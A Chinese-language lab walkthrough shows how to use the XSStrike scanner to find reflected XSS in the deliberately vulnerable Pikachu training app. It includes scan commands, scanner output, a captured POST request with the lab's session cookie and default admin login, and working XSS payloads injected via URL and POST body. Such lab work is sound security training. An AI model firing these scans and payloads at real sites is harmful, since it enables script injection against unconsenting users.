XSS漏洞
xsstrike用法
usage: xsstrike.py [-h] [-u target] [–data paramdata] [-e encode] [–fuzzer] [–update] [–timeout timeout] [–proxy] [–params] [–crawl] [–json] [–path] [–seeds args_seeds] [-f args_file] [-l level] [–headers [add_headers]] [-t threadcount] [-d delay] [–skip] [–skip-dom] [–blind] [–console-log-level {debug,info,run,good,warning,error,critical,vuln}] [–file-log-level {debug,info,run,good,warning,error,critical,vuln}] [–log-file log_file]
optional arguments: -h, –help show this help message and exit -u target, –url target url –data paramdata post data -e encode, –encode encode encode payloads –fuzzer fuzzer –update update –timeout timeout timeout –proxy use prox(y|ies) –params find params –crawl crawl –json treat post data as json –path inject payloads in the path –seeds args_seeds load crawling seeds from a file -f args_file, –file args_file load payloads from a file -l level, –level level level of crawling –headers [add_headers] add headers -t threadcount, –threads threadcount number of threads -d delay, –delay delay delay between requests –skip don’t ask to continue –skip-dom skip dom checking –blind inject blind xss payload while crawling –console-log-level {debug,info,run,good,warning,error,critical,vuln} console logging level –file-log-level {debug,info,run,good,warning,error,critical,vuln} file logging level –log-file log_file name of the file to log
利用xsstrike查找漏洞方法
反射性xss(get)
首先访问对应网站http://192.168.1.110/pikachu/vul/xss/xss_reflected_get.php
尝试提交信息,例如输入kobe,点击submit
看到http://192.168.1.110/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit
执行python xsstrike.py -u “http://192.168.1.110/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit”
得到结果如下(部分)
python xsstrike.py -u "http://192.168.1.110/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit"
XSStrike v3.1.466666
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: message
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072
------------------------------------------------------------
[+] Payload: <a%09ONmouseover%0a=%0aconfirm()%0dx>v3dm0s
[!] Efficiency: 96
[!] Confidence: 10
------------------------------------------------------------
尝试这个payload
http://192.168.1.110/pikachu/vul/xss/xss_reflected_get.php?message=%3Ca%09ONmouseover%0a=%0aconfirm()%0dx%3Ev3dm0s&submit=submit
发现可以利用!
反射型xss(post)
首先访问对应网页http://192.168.1.110/pikachu/vul/xss/xsspost/post_login.php
登录,用户名admin,密码123456
输入kobe,尝试点击submit
再次输入,这次我们用burpsuite抓包,得到如下:
POST /pikachu/vul/xss/xsspost/xss_reflected_post.php HTTP/1.1
Host: 192.168.1.110
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.110
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.110/pikachu/vul/xss/xsspost/xss_reflected_post.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=pn4nqa6t1cvlfp9t9m90ofminh
Connection: close
message=kobe&submit=submit
执行漏洞扫描:
python xsstrike.py -u "http://192.168.1.110/pikachu/vul/xss/xsspost/xss_reflected_post.php" --data "message=kobe&submit=submit" --headers "Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815"
得到结果(部分)
XSStrike v3.1.466666
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: message
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072
------------------------------------------------------------
[+] Payload: <DEtaIls%09onpoIntereNter%09=%09[8].find(confirm)>
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
尝试利用,即用burpsuite修改一下post的数据
message=<DEtaIls%09onpoIntereNter%09=%09[8].find(confirm)>&submit=submit
发现漏洞利用成功。
针对burpsuite无法抓取localhost的问题
别用localhost了,可以用本机的IP地址进行访问,也一样的,这样burpsuite就可以直接抓包了。
